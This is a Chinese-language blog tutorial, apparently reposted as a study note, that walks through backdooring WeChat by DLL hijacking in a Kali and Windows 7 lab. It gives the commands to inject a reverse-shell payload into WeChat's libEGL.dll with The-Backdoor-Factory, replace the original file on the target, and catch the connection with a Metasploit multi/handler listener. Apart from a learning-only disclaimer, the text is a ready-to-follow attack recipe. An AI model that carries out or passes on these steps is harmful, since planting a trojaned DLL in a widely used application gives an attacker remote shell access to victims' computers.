【漏洞復現】之微信DLL劫持反彈shell復現


(本文僅為平時學習記錄,若有錯誤請大佬指出,如果本文能幫到你那我也是很開心啦)

 

該復現參考網絡中的文章,該漏洞復現僅僅是為了學習交流,嚴禁非法使用!!!

 

一、環境

攻擊者:kali系統

  • 安裝后門工具The-Backdoor-Factory(DLL劫持)

靶機:Win 7系統

  • 安裝ProcessExplorer,安裝微信

ProcessExplorer:任務管理工具,看到當前系統中所有運行的程序(在溯源、任務管理中很好用)

 

二、微信DLL劫持反彈shell

1.保證攻擊者與靶機互通

2.在Win7中打開ProcessExplorer,打開微信,並在ProcessExplorer中找到WeChat.exe,點擊WeChat.exe,點擊菜單欄中的View --> Lower Pane View --> DLLs

  • 點擊DLLs后,在窗口下方出現了很多.dll文件,這些.dll文件就是當前微信在啟動過程中所需要動態鏈接庫文件,

3.在ProcessExplorer找到安裝在微信里面的動態鏈接庫文件,選擇libEGL.dll動態鏈接庫文件,找到libEGL.dll文件所在位置,將libEGL.dll文件拷貝到kali中的The-Backdoor-Factory后門工具所在的文件夾內,並關閉微信

  • 點擊Path,排在前面的.dll文件就是安裝在微信里的或者看路徑是否在安裝路徑下

4.打開kali,進入The-Backdoor-Factory后門工具所在的文件夾內,啟動終端

./backdoor.py   檢查工具是否可用

  • 上圖可以看到,工具不可以,沒有名字為capstone的模板
  • 解決方法:
pip intall capstone  安裝capstone模板

5.使用The-Backdoor-Factory工具,生成注入后門的動態鏈接庫文件

1 ./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H kali的IP
2     -f  后跟要注入的文件
3     -s  反彈shell,后跟反彈什么類型的shell
4     -P  反彈給哪個端口,后跟端口
5     -H  反彈給哪個主機,后跟IP

  • 隨機選擇注入點,這里我選擇1

  • 上圖可以看出,生成的動態鏈接庫文件被放到了backdoored文件夾內,進入文件夾內,可以看到libEGL.dll文件,這個文件就是被注入后門的動態鏈接庫文件

6.將被注入后門的動態鏈接庫文件libEGL.dll拷貝到Win7系統中,將原來的libEGL.dll覆蓋

7.開啟postgresql數據庫和Metasploit

1 /etc/init.d/postgresql start  開啟postgresql數據庫
2 msfconsole  開啟Metasploit

8.加載exploits和payloads,查看該模塊需要設置的參數

1 use exploit/multi/handler  選擇exploits(這個exploit經常用來監聽反彈過來的shell)
2 set payload windows/shell_reverse_tcp  設置payload
3 show options  查看所需設置的參數

  • 根據上圖的需求設置lhost和lport,並運行攻擊模塊
1 set lhost kali的IP  設置監聽地址
2 set lport 6666  設置監聽端口
3 run 或者exploit  運行攻擊模塊

9.打開Win 7系統,打開微信,然后打開kali就可以得到Win 7的shell(meterpreter)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM